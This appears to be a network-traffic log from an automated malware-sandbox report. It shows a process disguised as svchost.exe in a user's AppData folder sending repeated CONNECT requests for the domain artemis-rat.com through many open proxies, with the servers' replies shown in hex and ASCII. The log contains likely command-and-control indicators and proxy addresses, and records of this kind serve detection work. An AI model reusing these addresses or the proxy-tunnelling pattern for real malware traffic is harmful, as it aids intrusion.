Mar 9, 2024 13:14:34.034569025 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2425	192.168.2.5	57941	104.17.132.79	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.212551117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.366806984 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2426	192.168.2.5	57946	203.30.188.247	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.217220068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.371666908 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2427	192.168.2.5	56697	117.160.250.163	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.225333929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.828896046 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2428	192.168.2.5	57849	20.37.207.8	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.225636005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.539906979 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2429	192.168.2.5	57961	104.16.109.213	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.226926088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.381027937 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2430	192.168.2.5	57939	159.65.77.168	8585	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.229341030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2431	192.168.2.5	57967	104.17.171.235	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.229839087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.384205103 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2432	192.168.2.5	57915	154.208.10.126	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.241894007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.402767897 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.23.1 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2433	192.168.2.5	57857	8.142.3.145	3306	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.245527029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2434	192.168.2.5	57997	104.17.62.87	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.246042013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.400836945 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2435	192.168.2.5	57877	65.21.255.197	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.248007059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.571845055 CET	75	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Length: 0
Mar 9, 2024 13:14:30.913935900 CET	103	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2436	192.168.2.5	57860	83.243.92.154	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.253751040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2437	192.168.2.5	57856	120.33.126.200	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.259032965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.045707941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.068336010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2438	192.168.2.5	57168	117.160.250.163	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.262265921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.134279966 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:30 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2439	192.168.2.5	57917	184.170.248.5	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.300389051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2440	192.168.2.5	57911	31.207.38.66	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.311554909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.613563061 CET	408	IN	HTTP/1.1 405 Method Not Allowed Date: Sat, 09 Mar 2024 12:14:30 GMT Server: Apache Allow: OPTIONS,HEAD,GET,POST Content-Length: 224 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2441	192.168.2.5	58016	104.24.220.52	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.325517893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.480099916 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2442	192.168.2.5	58020	162.159.242.8	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.326026917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.492433071 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2443	192.168.2.5	58010	172.67.254.127	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.326184988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.481079102 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2444	192.168.2.5	57892	203.218.172.225	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.326245070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2445	192.168.2.5	57844	52.172.1.186	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.326529026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2446	192.168.2.5	58074	104.25.108.120	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.326719046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.480999947 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2447	192.168.2.5	57912	43.131.248.165	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.345839977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2448	192.168.2.5	57909	120.76.42.209	8888	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.346004009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.686037064 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 